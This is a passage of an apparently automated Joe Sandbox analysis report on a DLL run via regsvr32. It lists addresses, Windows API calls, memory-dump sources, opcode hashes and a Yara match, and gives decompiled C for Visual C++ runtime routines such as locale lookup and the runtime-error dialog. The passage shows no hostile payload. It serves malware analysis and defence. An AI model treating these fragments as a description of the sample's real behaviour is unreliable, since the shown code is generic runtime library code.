                                                                                                    0x180041239
                                                                                                    0x18004123e
                                                                                                    0x180041243
                                                                                                    0x180041247
                                                                                                    0x18004124a
                                                                                                    0x180041253
                                                                                                    0x180041256
                                                                                                    0x180041256
                                                                                                    0x18004125d
                                                                                                    0x180041264
                                                                                                    0x18004126b
                                                                                                    0x180041272
                                                                                                    0x180041278
                                                                                                    0x18004127e
                                                                                                    0x180041280
                                                                                                    0x180041292
                                                                                                    0x180041297
                                                                                                    0x18004129b
                                                                                                    0x1800412a5
                                                                                                    0x1800412ab
                                                                                                    0x1800412ad
                                                                                                    0x1800412b3
                                                                                                    0x1800412b9
                                                                                                    0x1800412bf
                                                                                                    0x1800412c4
                                                                                                    0x1800412ca
                                                                                                    0x1800412d3
                                                                                                    0x1800412d9
                                                                                                    0x1800412df
                                                                                                    0x1800412f6
                                                                                                    0x1800412fc
                                                                                                    0x180041302
                                                                                                    0x180041308
                                                                                                    0x18004130e
                                                                                                    0x180041313
                                                                                                    0x180041315
                                                                                                    0x180041319
                                                                                                    0x18004131e
                                                                                                    0x180041320
                                                                                                    0x180041326
                                                                                                    0x18004132c
                                                                                                    0x18004132e
                                                                                                    0x180041341
                                                                                                    0x180041349
                                                                                                    0x18004135c
                                                                                                    0x180041367
                                                                                                    0x180041371
                                                                                                    0x180041373
                                                                                                    0x180041377
                                                                                                    0x180041379
                                                                                                    0x180041380
                                                                                                    0x180041386
                                                                                                    0x180041389
                                                                                                    0x180041390
                                                                                                    0x180041396
                                                                                                    0x1800413a4
                                                                                                    0x1800413aa
                                                                                                    0x1800413b3
                                                                                                    0x1800413b9
                                                                                                    0x1800413c2
                                                                                                    0x1800413d3
                                                                                                    0x1800413e9
                                                                                                    0x1800413f2
                                                                                                    0x1800413f4
                                                                                                    0x1800413fa
                                                                                                    0x180041401
                                                                                                    0x180041404
                                                                                                    0x180041404
                                                                                                    0x180041408
                                                                                                    0x18004140b
                                                                                                    0x180041413
                                                                                                    0x18004141f
                                                                                                    0x180041422
                                                                                                    0x180041425
                                                                                                    0x180041432
                                                                                                    0x180041445
                                                                                                    0x180041451
                                                                                                    0x180041461
                                                                                                    0x18004146c
                                                                                                    0x18004146c
                                                                                                    0x180041470
                                                                                                    0x180041470
                                                                                                    0x180041474
                                                                                                    0x18004147e
                                                                                                    0x18004149c

                                                                                                    APIs
                                                                                                      • Part of subcall function 000000018002C43C: GetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C446
                                                                                                      • Part of subcall function 000000018002C43C: SetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C4C4
                                                                                                      • Part of subcall function 000000018002C43C: abort.LIBCMT ref: 000000018002C4CA
                                                                                                      • Part of subcall function 000000018002C43C: SetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C4AE
                                                                                                    • EnumSystemLocalesW.KERNEL32(?,?,?,00000000,00000001,00000000,?,0000000180036E6D), ref: 0000000180041367
                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000000), ref: 0000000180041380
                                                                                                    • ProcessCodePage.LIBCMT ref: 00000001800413AA
                                                                                                    • IsValidCodePage.KERNEL32 ref: 00000001800413CB
                                                                                                    • IsValidLocale.KERNEL32 ref: 00000001800413E1
                                                                                                    • GetLocaleInfoW.KERNEL32 ref: 000000018004143D
                                                                                                    • GetLocaleInfoW.KERNEL32 ref: 0000000180041459
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastLocale$CodeInfoPageValid$DefaultEnumLocalesProcessSystemUserabort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3941709727-0
                                                                                                    • Opcode ID: d2428b1324d276d545675b0ba4877e05410229328fe6a9e932d7837c69a851f5
                                                                                                    • Instruction ID: 1f86f43d0497d3c91ce47fbd1482be7512a23523e3fd677806652f6b00d5aae9
                                                                                                    • Opcode Fuzzy Hash: d2428b1324d276d545675b0ba4877e05410229328fe6a9e932d7837c69a851f5
                                                                                                    • Instruction Fuzzy Hash: 76717E32710A488AFB92AF64D4907ED33A4B74C7CDF46C115AA0953B95EF788B49C358
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002F114 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 122fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseFirstNextmemset
                                                                                                    • String ID: .$.
                                                                                                    • API String ID: 416031871-3769392785
                                                                                                    • Opcode ID: 83dfadd4a6f85078b48b61705e48de0a028e39a98efbad2d3d250c201a9c0279
                                                                                                    • Instruction ID: 9fc004f91796af7075b4cbf6154fd3794143d0a6e1e4b7fcc9d6ee10353a8802
                                                                                                    • Opcode Fuzzy Hash: 83dfadd4a6f85078b48b61705e48de0a028e39a98efbad2d3d250c201a9c0279
                                                                                                    • Instruction Fuzzy Hash: D141C57631059884FAB3DB66D8047FAA391E789BE4F45C222BE59467C8DE78C64D8700
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180041BE4 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 121COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 82%
                                                                                                    			E00000001180041BE4(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* __rdi;
				void* _t13;
				void* _t22;
				void* _t25;
				void* _t47;
				void* _t66;
				void* _t83;

				_t81 = __r9;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t47 = __rcx;
				_t13 = E0000000118004451C(3, _t25, __rax);
				if (_t13 == 1) goto 0x80041d17;
				if (_t13 != 0) goto 0x80041c25;
				if ( *0x8005ef18 == 1) goto 0x80041d17;
				r15d = 0x314;
				if (E00000001180030878(r15d, __rax, 0x8005ef20, __rdx, L"Runtime Error!\n\nProgram: ") != 0) goto 0x80041d8c;
				 *0x8005f15a = 0;
				r8d = 0x104;
				if (GetModuleFileNameW(??, ??, ??) != 0) goto 0x80041c8c;
				_t27 = _t83 - 0x19;
				if (E00000001180030878(_t83 - 0x19, __rax, 0x8005ef52, 0x8005ef52, L"<program name unknown>") != 0) goto 0x80041d38;
				if ( *0x48011CDF6 != 0) goto 0x80041c90;
				if (0x18005ef53 - 0x3c <= 0) goto 0x80041cd4;
				r9d = 3;
				if (E00000001180038A10(_t83 - 0x19, 0 >> 1, __rcx, 0x18005eedc, _t66 - 0x8005ef52, __r9) != 0) goto 0x80041d4d;
				if (E0000000118003FD7C(_t83 - 0x19, 0 >> 1, 0x8005ef20, _t83, L"\n\n") != 0) goto 0x80041d77;
				_t80 = __rcx;
				if (E0000000118003FD7C(_t83 - 0x19, 0 >> 1, 0x8005ef20, _t83, __rcx) != 0) goto 0x80041d62;
				r8d = 0x12010;
				E00000001180044A10(_t22, 0, _t83 - 0x19, E0000000118003FD7C(_t83 - 0x19, 0 >> 1, 0x8005ef20, _t83, __rcx), __rcx, 0x8005ef20, L"Microsoft Visual C++ Runtime Library", _t66 - 0x8005ef52, __rsi, 0x8005ef20, __rcx, _t81);
				goto 0x80041d1f;
				return E00000001180041B3C(_t27, _t47, _t80);
			}










                                                                                                    0x180041be4
                                                                                                    0x180041be4
                                                                                                    0x180041be9
                                                                                                    0x180041bee
                                                                                                    0x180041bfc
                                                                                                    0x180041c04
                                                                                                    0x180041c0c
                                                                                                    0x180041c16
                                                                                                    0x180041c1f
                                                                                                    0x180041c25
                                                                                                    0x180041c48
                                                                                                    0x180041c55
                                                                                                    0x180041c5f
                                                                                                    0x180041c71
                                                                                                    0x180041c7a
                                                                                                    0x180041c86
                                                                                                    0x180041c98
                                                                                                    0x180041ca2
                                                                                                    0x180041cac
                                                                                                    0x180041cd2
                                                                                                    0x180041ce8
                                                                                                    0x180041cee
                                                                                                    0x180041cfe
                                                                                                    0x180041d00
                                                                                                    0x180041d10
                                                                                                    0x180041d15
                                                                                                    0x180041d37

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName_set_error_mode
                                                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                    • API String ID: 3581924421-4022980321
                                                                                                    • Opcode ID: 2332121997ca31354af1e8177fbde37023b69996d842484b1f8c6f94b1214874
                                                                                                    • Instruction ID: 01a8c0564eec1dba063b09917d41300208c5c53c03e339e76c603164c5bc34dd
                                                                                                    • Opcode Fuzzy Hash: 2332121997ca31354af1e8177fbde37023b69996d842484b1f8c6f94b1214874
                                                                                                    • Instruction Fuzzy Hash: 95415331700A984AF7E69B32A8517DB2351BB8DBC8F50C922BE5543AD5DF38C3098704
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261D524 Relevance: 10.6, Strings: 8, Instructions: 555COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: !P<U$@$Cp$Tnr[$X$j$n$p
                                                                                                    • API String ID: 0-3287188629
                                                                                                    • Opcode ID: a50faf894d793c08198eb3dd1ba27254bdd7633bbe4611167a7478deb983a416
                                                                                                    • Instruction ID: 8a7ebf97ab30c9242f5004dd88f80a289646659b90b9eb195cb32a1ece6e077a
                                                                                                    • Opcode Fuzzy Hash: a50faf894d793c08198eb3dd1ba27254bdd7633bbe4611167a7478deb983a416
                                                                                                    • Instruction Fuzzy Hash: 5442DCB05087848FD758CFA9C58A51AFBE1FB84748F148A1DE486872A0D7F8E949CF42
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018003C4D0 Relevance: 9.2, APIs: 6, Instructions: 248COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 76%
                                                                                                    			E0000000118003C4D0(intOrPtr* __rcx, signed int __rdx, signed int __rbp, signed int __r9, long long __r12, long long __r13, long long __r14, long long __r15, long long _a24) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				signed int _v72;
				void* _v532;
				intOrPtr _v536;
				void* __rbx;
				void* __rsi;
				intOrPtr _t99;
				void* _t100;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				intOrPtr _t122;
				intOrPtr _t133;
				signed long long _t167;
				signed long long _t168;
				signed long long _t169;
				void* _t170;
				signed long long _t172;
				signed long long _t180;
				signed long long _t186;
				void* _t188;
				signed long long _t191;
				signed long long _t195;
				void* _t216;

				_t167 =  *0x8005d010; // 0xb03f6156e10
				_t168 = _t167 ^ _t195;
				_v72 = _t168;
				_t107 =  *__rdx;
				if (_t107 - 1 > 0) goto 0x8003c5b3;
				if ( *((intOrPtr*)(__rdx + 4)) != 0) goto 0x8003c52a;
				r10d = 0;
				r9d = 0;
				_v536 = r10d;
				 *__rcx = r10d;
				E0000000118003E44C(0x1cc, _t168, _t170, __rcx + 4, __rdx, __rcx,  &_v532, __r9, _t216);
				goto 0x8003c81a;
				if (1 == 1) goto 0x8003c523;
				r11d =  *__rcx;
				if (r11d == 0) goto 0x8003c523;
				r10d = 0;
				r8d = r10d;
				r9d = r10d;
				_t191 = _t168;
				asm("o16 nop [eax+eax]");
				r9d = r9d + 1;
				_t186 = __rdx * _t191 + _t168;
				if (r9d != r11d) goto 0x8003c550;
				if (r8d == 0) goto 0x8003c523;
				if ( *__rcx - 0x73 >= 0) goto 0x8003c58f;
				 *((intOrPtr*)(__rcx + 4 + _t168 * 4)) = r8d;
				 *__rcx =  *__rcx + 1;
				goto 0x8003c81a;
				r9d = 0;
				_v536 = r10d;
				 *__rcx = r10d;
				E0000000118003E44C(0x1cc, _t168, __rcx + 4, __rcx + 4, _t186, __rcx,  &_v532, __r9, _t216);
				goto 0x8003c81a;
				_v48 = __r14;
				r14d =  *__rcx;
				if (r14d - 1 > 0) goto 0x8003c693;
				_t133 =  *((intOrPtr*)(__rcx + 4));
				_t172 = __rcx + 4;
				 *__rcx = _t107;
				r9d =  *_t186;
				E0000000118003E44C(0x1cc, _t168, _t172, _t172, _t186, __rcx, _t186 + 4, __r9 << 2, _t216);
				if (_t133 != 0) goto 0x8003c614;
				r10d = 0;
				r9d = 0;
				_v536 = r10d;
				 *__rcx = r10d;
				E0000000118003E44C(0x1cc, _t168, _t172, _t172, _t186, __rcx,  &_v532, __r9 << 2, _t216);
				goto 0x8003c812;
				if (_t133 == 1) goto 0x8003c60d;
				r11d =  *__rcx;
				if (r11d == 0) goto 0x8003c60d;
				r10d = 0;
				r8d = r10d;
				r9d = r10d;
				asm("o16 nop [eax+eax]");
				r9d = r9d + 1;
				_t188 = _t186 * _t191 + _t168;
				if (r9d != r11d) goto 0x8003c630;
				if (r8d == 0) goto 0x8003c60d;
				if ( *__rcx - 0x73 >= 0) goto 0x8003c66f;
				 *((intOrPtr*)(__rcx + 4 + _t168 * 4)) = r8d;
				 *__rcx =  *__rcx + 1;
				goto 0x8003c812;
				r9d = 0;
				_v536 = r10d;
				 *__rcx = r10d;
				_t180 = _t172;
				E0000000118003E44C(0x1cc, _t168, _t172, _t180, _t188, __rcx,  &_v532, __r9 << 2, _t216);
				goto 0x8003c812;
				_v32 = __r12;
				_v40 = __r13;
				_v56 = __r15;
				_t169 = __rcx + 4;
				if (0 == 0) goto 0x8003c6c5;
				r12d = _t107;
				goto 0x8003c6d2;
				r12d = r14d;
				r14d = _t107;
				r10d = 0;
				_a24 = __rbp;
				_t108 = r10d;
				_t105 = r10d;
				_v536 = _t108;
				if (r12d == 0) goto 0x8003c7d4;
				if ( *((intOrPtr*)(_t169 + _t169 * 4)) != 0) goto 0x8003c714;
				if (_t105 != _t108) goto 0x8003c7c9;
				_t43 = _t172 + 1; // 0x1
				_t109 = _t43;
				 *((intOrPtr*)(_t195 + 0x24 + _t169 * 4)) = r10d;
				_v536 = _t109;
				goto 0x8003c7c9;
				r11d = r10d;
				_t99 = _t105;
				if (r14d == 0) goto 0x8003c7c4;
				if (_t99 == 0x73) goto 0x8003c77c;
				if (_t99 != _t109) goto 0x8003c742;
				_t48 = _t172 + 1; // 0x1
				 *((intOrPtr*)(_t195 + 0x24 + _t180 * 4)) = r10d;
				_v536 = _t48 + _t191 + _t169;
				_t100 = _t99 + 1;
				r8d =  *((intOrPtr*)(_t188 + 4 + _t180 * 4));
				 *( &_v532 + _t180 * 4) = r8d;
				if (_t191 + _t169 != r14d) goto 0x8003c726;
				if (r11d == 0) goto 0x8003c7c4;
				if (_t100 == 0x73) goto 0x8003c835;
				if (_t100 != _v536) goto 0x8003c79c;
				 *((intOrPtr*)(_t195 + 0x24 + _t180 * 4)) = r10d;
				_t65 = _t169 + 1; // 0x1
				_v536 = _t65;
				r8d = r11d;
				 *( &_v532 + _t180 * 4) = r8d;
				_t122 = _v536;
				r11d = r8d;
				if (r8d != 0) goto 0x8003c781;
				if (_t100 + 1 == 0x73) goto 0x8003c835;
				if (_t105 + 1 != r12d) goto 0x8003c6f0;
				r9d = _t122;
				 *__rcx = _t122;
				E0000000118003E44C(0x1cc, _t169, _t172, __rcx + 4,  &_v532 + _t180 * 4, __rcx,  &_v532,  &_v532 + _t180 * 4 << 2,  &_v532 * __rbp + _t180 + _t180 >> 0x20);
				return E000000011800010E0(1, _t122, _v72 ^ _t195);
			}































                                                                                                    0x18003c4db
                                                                                                    0x18003c4e2
                                                                                                    0x18003c4e5
                                                                                                    0x18003c4f0
                                                                                                    0x18003c4f5
                                                                                                    0x18003c500
                                                                                                    0x18003c502
                                                                                                    0x18003c509
                                                                                                    0x18003c50c
                                                                                                    0x18003c516
                                                                                                    0x18003c51e
                                                                                                    0x18003c525
                                                                                                    0x18003c52d
                                                                                                    0x18003c52f
                                                                                                    0x18003c535
                                                                                                    0x18003c537
                                                                                                    0x18003c53e
                                                                                                    0x18003c541
                                                                                                    0x18003c544
                                                                                                    0x18003c547
                                                                                                    0x18003c553
                                                                                                    0x18003c564
                                                                                                    0x18003c573
                                                                                                    0x18003c578
                                                                                                    0x18003c57f
                                                                                                    0x18003c581
                                                                                                    0x18003c588
                                                                                                    0x18003c58a
                                                                                                    0x18003c58f
                                                                                                    0x18003c592
                                                                                                    0x18003c59c
                                                                                                    0x18003c5a7
                                                                                                    0x18003c5ae
                                                                                                    0x18003c5b3
                                                                                                    0x18003c5bb
                                                                                                    0x18003c5c2
                                                                                                    0x18003c5c8
                                                                                                    0x18003c5cb
                                                                                                    0x18003c5cf
                                                                                                    0x18003c5d5
                                                                                                    0x18003c5e4
                                                                                                    0x18003c5eb
                                                                                                    0x18003c5ed
                                                                                                    0x18003c5f5
                                                                                                    0x18003c5f8
                                                                                                    0x18003c602
                                                                                                    0x18003c608
                                                                                                    0x18003c60f
                                                                                                    0x18003c617
                                                                                                    0x18003c619
                                                                                                    0x18003c61f
                                                                                                    0x18003c621
                                                                                                    0x18003c624
                                                                                                    0x18003c627
                                                                                                    0x18003c62a
                                                                                                    0x18003c633
                                                                                                    0x18003c644
                                                                                                    0x18003c653
                                                                                                    0x18003c658
                                                                                                    0x18003c65f
                                                                                                    0x18003c661
                                                                                                    0x18003c668
                                                                                                    0x18003c66a
                                                                                                    0x18003c66f
                                                                                                    0x18003c672
                                                                                                    0x18003c67c
                                                                                                    0x18003c684
                                                                                                    0x18003c687
                                                                                                    0x18003c68e
                                                                                                    0x18003c696
                                                                                                    0x18003c69e
                                                                                                    0x18003c6a9
                                                                                                    0x18003c6b3
                                                                                                    0x18003c6b7
                                                                                                    0x18003c6c0
                                                                                                    0x18003c6c3
                                                                                                    0x18003c6c5
                                                                                                    0x18003c6cc
                                                                                                    0x18003c6d2
                                                                                                    0x18003c6d5
                                                                                                    0x18003c6dd
                                                                                                    0x18003c6e0
                                                                                                    0x18003c6e3
                                                                                                    0x18003c6ea
                                                                                                    0x18003c6f9
                                                                                                    0x18003c6fd
                                                                                                    0x18003c703
                                                                                                    0x18003c703
                                                                                                    0x18003c706
                                                                                                    0x18003c70b
                                                                                                    0x18003c70f
                                                                                                    0x18003c714
                                                                                                    0x18003c717
                                                                                                    0x18003c71c
                                                                                                    0x18003c729
                                                                                                    0x18003c72d
                                                                                                    0x18003c731
                                                                                                    0x18003c734
                                                                                                    0x18003c73e
                                                                                                    0x18003c750
                                                                                                    0x18003c752
                                                                                                    0x18003c76c
                                                                                                    0x18003c77a
                                                                                                    0x18003c77f
                                                                                                    0x18003c784
                                                                                                    0x18003c78c
                                                                                                    0x18003c790
                                                                                                    0x18003c795
                                                                                                    0x18003c798
                                                                                                    0x18003c7a7
                                                                                                    0x18003c7b1
                                                                                                    0x18003c7b4
                                                                                                    0x18003c7bc
                                                                                                    0x18003c7c2
                                                                                                    0x18003c7c7
                                                                                                    0x18003c7ce
                                                                                                    0x18003c7d4
                                                                                                    0x18003c7dc
                                                                                                    0x18003c7eb
                                                                                                    0x18003c834

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 1502251526-0
                                                                                                    • Opcode ID: 033fe695c0faf62d023cd935c2dbe646a5d45670dfe2bcd3b48acb5b26bffc17
                                                                                                    • Instruction ID: de3964d1abc693c2942dcd429ced414edab5269705916313a60b5839f1c2094f
                                                                                                    • Opcode Fuzzy Hash: 033fe695c0faf62d023cd935c2dbe646a5d45670dfe2bcd3b48acb5b26bffc17
                                                                                                    • Instruction Fuzzy Hash: E6A1A27620868586EBB78F15A440BEB77A0F35C7C4F55D115EB8A93B84CF38DA48CB41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180040750 Relevance: 9.2, APIs: 6, Instructions: 208COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 63%
                                                                                                    			E00000001180040750(void* __ecx, void* __edx, long long __rbx, intOrPtr __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r8, signed int __r9) {
				intOrPtr _t36;
				void* _t46;
				void* _t79;
				intOrPtr* _t80;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t103;
				intOrPtr* _t107;
				long long _t110;
				void* _t111;
				void* _t113;
				signed long long _t125;
				void* _t126;
				void* _t127;
				void* _t129;
				intOrPtr _t130;
				int _t132;
				intOrPtr* _t133;

				_t99 = __rdx;
				_t46 = __ecx;
				_t79 = _t113;
				 *((long long*)(_t79 + 8)) = __rbx;
				 *((long long*)(_t79 + 0x10)) = _t110;
				 *((long long*)(_t79 + 0x18)) = __rsi;
				 *((long long*)(_t79 + 0x20)) = __rdi;
				_t111 = __r8;
				_t107 = __rdx;
				_t130 = __rcx;
				E0000000118002C43C(_t79, __rbx);
				r12d = 0;
				_t5 = _t79 + 0x98; // 0x98
				_t85 = _t5;
				_t80 = _t130 + 0x80;
				 *((intOrPtr*)(_t85 + 0x10)) = r12d;
				_t8 = _t85 + 0x258; // 0x2f0
				_t133 = _t8;
				 *_t85 = _t130;
				_t9 = _t85 + 8; // 0xa0
				_t103 = _t9;
				 *_t133 = r12w;
				 *_t103 = _t80;
				if ( *_t80 == r12w) goto 0x800407bf;
				_t10 = _t127 + 0x16; // 0x16
				E000000011800406B4(_t10, _t85, 0x800517f0, _t103, _t107, _t103);
				if ( *((intOrPtr*)( *_t85)) == r12w) goto 0x80040818;
				if ( *((intOrPtr*)( *_t103)) == r12w) goto 0x800407db;
				E0000000118003FEE4(_t85, _t85, _t103, __r9);
				goto 0x800407e0;
				E0000000118003FFB4(_t85, _t85, _t103, __r9);
				if ( *((intOrPtr*)(_t85 + 0x10)) != r12d) goto 0x80040827;
				if (E000000011800406B4(0x40, _t85, 0x800513d0, _t103, _t107, _t85) == 0) goto 0x8004081d;
				_t83 =  *_t103;
				if ( *_t83 == r12w) goto 0x80040811;
				E0000000118003FEE4(_t85, _t85, _t85, __r9);
				goto 0x8004081d;
				E0000000118003FFB4(_t85, _t85, _t85, __r9);
				goto 0x8004081d;
				E0000000118003FE3C(_t46,  *_t83 - r12w, _t85, _t85, _t99, _t107, _t85, __r9);
				if ( *((intOrPtr*)(_t85 + 0x10)) == r12d) goto 0x80040937;
				_t36 = E00000001180040520(_t85, _t130 + 0x100, _t85, _t107, __r8, __r9);
				if (_t36 == 0) goto 0x80040937;
				_t14 = _t83 - 0xfde8; // -65000
				if (_t14 - 1 <= 0) goto 0x80040937;
				if (IsValidCodePage(_t132) == 0) goto 0x80040937;
				if (_t107 == 0) goto 0x80040867;
				 *_t107 = _t36;
				if (_t111 == 0) goto 0x80040930;
				_t108 = _t111 + 0x120;
				 *((intOrPtr*)(_t111 + 0x120)) = r12w;
				_t125 = (__r9 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t133 + _t125 * 2)) != r12w) goto 0x8004087f;
				_t126 = _t125 + 1;
				if (E00000001180038A10(0x55, _t83, _t85, _t111 + 0x120, _t85, _t126) != 0) goto 0x80040958;
				_t18 = _t83 + 0x40; // 0x40
				r9d = _t18;
				if (E0000000118002D69C(0x1001, E00000001180038A10(0x55, _t83, _t85, _t111 + 0x120, _t85, _t126), _t85, _t111 + 0x120, _t103, _t111 + 0x120, _t111, _t111, _t129, _t127) == 0) goto 0x80040937;
				r9d = 0x40;
				if (E0000000118002D69C(0x1002, E0000000118002D69C(0x1001, E00000001180038A10(0x55, _t83, _t85, _t111 + 0x120, _t85, _t126), _t85, _t111 + 0x120, _t103, _t111 + 0x120, _t111, _t111, _t129, _t127), _t85, _t111 + 0x120, _t111 + 0x80, _t108, _t111, _t111 + 0x80) == 0) goto 0x80040937;
				0x80046f57();
				if (_t83 != 0) goto 0x800408ff;
				0x80046f57();
				if (_t83 == 0) goto 0x80040918;
				r9d = 0x40;
				_t21 = _t126 - 0x39; // 0x7
				if (E0000000118002D69C(_t21, _t83, _t85, _t108, _t111 + 0x80, _t108, _t111, _t111 + 0x80) == 0) goto 0x80040937;
				r9d = 0xa;
				_t23 = _t126 + 6; // 0x46
				r8d = _t23;
				E00000001180044018(_t36);
				goto 0x80040939;
				return 0;
			}





















                                                                                                    0x180040750
                                                                                                    0x180040750
                                                                                                    0x180040750
                                                                                                    0x180040753
                                                                                                    0x180040757
                                                                                                    0x18004075b
                                                                                                    0x18004075f
                                                                                                    0x18004076d
                                                                                                    0x180040770
                                                                                                    0x180040773
                                                                                                    0x180040776
                                                                                                    0x18004077b
                                                                                                    0x18004077e
                                                                                                    0x18004077e
                                                                                                    0x180040785
                                                                                                    0x18004078c
                                                                                                    0x180040790
                                                                                                    0x180040790
                                                                                                    0x180040797
                                                                                                    0x18004079a
                                                                                                    0x18004079a
                                                                                                    0x18004079e
                                                                                                    0x1800407a2
                                                                                                    0x1800407a9
                                                                                                    0x1800407ae
                                                                                                    0x1800407ba
                                                                                                    0x1800407c9
                                                                                                    0x1800407d2
                                                                                                    0x1800407d4
                                                                                                    0x1800407d9
                                                                                                    0x1800407db
                                                                                                    0x1800407e4
                                                                                                    0x1800407fc
                                                                                                    0x1800407fe
                                                                                                    0x180040808
                                                                                                    0x18004080a
                                                                                                    0x18004080f
                                                                                                    0x180040811
                                                                                                    0x180040816
                                                                                                    0x180040818
                                                                                                    0x180040821
                                                                                                    0x180040831
                                                                                                    0x18004083a
                                                                                                    0x180040840
                                                                                                    0x180040849
                                                                                                    0x18004085a
                                                                                                    0x180040863
                                                                                                    0x180040865
                                                                                                    0x18004086a
                                                                                                    0x180040870
                                                                                                    0x18004087b
                                                                                                    0x18004087f
                                                                                                    0x180040887
                                                                                                    0x180040889
                                                                                                    0x18004089e
                                                                                                    0x1800408a4
                                                                                                    0x1800408a4
                                                                                                    0x1800408ba
                                                                                                    0x1800408c3
                                                                                                    0x1800408db
                                                                                                    0x1800408e5
                                                                                                    0x1800408ed
                                                                                                    0x1800408f5
                                                                                                    0x1800408fd
                                                                                                    0x1800408ff
                                                                                                    0x18004090b
                                                                                                    0x180040916
                                                                                                    0x180040918
                                                                                                    0x180040927
                                                                                                    0x180040927
                                                                                                    0x18004092b
                                                                                                    0x180040935
                                                                                                    0x180040957

                                                                                                    APIs
                                                                                                    Memory Dump Source
